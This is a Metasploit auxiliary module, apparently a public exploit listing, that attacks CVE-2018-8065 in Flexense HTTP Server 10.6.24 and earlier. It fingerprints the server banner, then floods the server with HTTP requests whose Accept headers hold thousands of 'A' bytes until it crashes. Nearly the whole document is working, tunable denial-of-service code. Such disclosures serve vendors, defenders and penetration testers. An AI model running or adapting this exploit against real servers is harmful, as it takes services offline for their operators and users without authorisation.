Flexense HTTP Server 10.6.24 Buffer Overflow / Denial Of Service

`##  
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)  
# Date: 2018-03-09  
# Exploit Author: Ege Balci  
# Vendor Homepage: https://www.flexense.com/downloads.html  
# Version: <= 10.6.24  
# CVE : CVE-2018-8065  
  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Dos  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Flexense HTTP Server Denial Of Service',  
'Description' => %q{  
This module triggers a Denial of Service vulnerability in the Flexense HTTP server.  
Vulnerability caused by a user mode write access memory violation and can be triggered with  
rapidly sending variety of HTTP requests with long HTTP header values.  
  
Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.  
},  
'Author' => [ 'Ege Balci <[email protected]>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2018-8065'],  
[ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],  
],  
'DisclosureDate' => '2018-03-09'))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),  
OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])  
])  
  
end  
  
def check  
begin  
connect  
sock.put("GET / HTTP/1.0\r\n\r\n")  
res = sock.get  
if res and res.include? 'Flexense HTTP Server v10.6.24'  
Exploit::CheckCode::Appears  
else  
Exploit::CheckCode::Safe  
end  
rescue Rex::ConnectionRefused  
print_error("Target refused the connection")  
Exploit::CheckCode::Unknown  
rescue  
print_error("Target did not respond to HTTP request")  
Exploit::CheckCode::Unknown  
end  
end  
  
def run  
unless check == Exploit::CheckCode::Appears  
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')  
end  
  
size = datastore['PacketSize'].to_i  
print_status("Starting with packets of #{size}-byte strings")  
  
count = 0  
loop do  
payload = ""  
payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"  
payload << "Host: 127.0.0.1\r\n"  
payload << "Accept: "+('A' * size)+"\r\n"  
payload << "\r\n\r\n"  
begin  
connect  
sock.put(payload)  
disconnect  
count += 1  
break if count==datastore['PacketCount']  
rescue ::Rex::InvalidDestination  
print_error('Invalid destination! Continuing...')  
rescue ::Rex::ConnectionTimeout  
print_error('Connection timeout! Continuing...')  
rescue ::Errno::ECONNRESET  
print_error('Connection reset! Continuing...')  
rescue ::Rex::ConnectionRefused  
print_good("DoS successful after #{count} packets with #{size}-byte headers")  
return true  
end  
end  
print_error("DoS failed after #{count} packets of #{size}-byte strings")  
end  
end  
  
`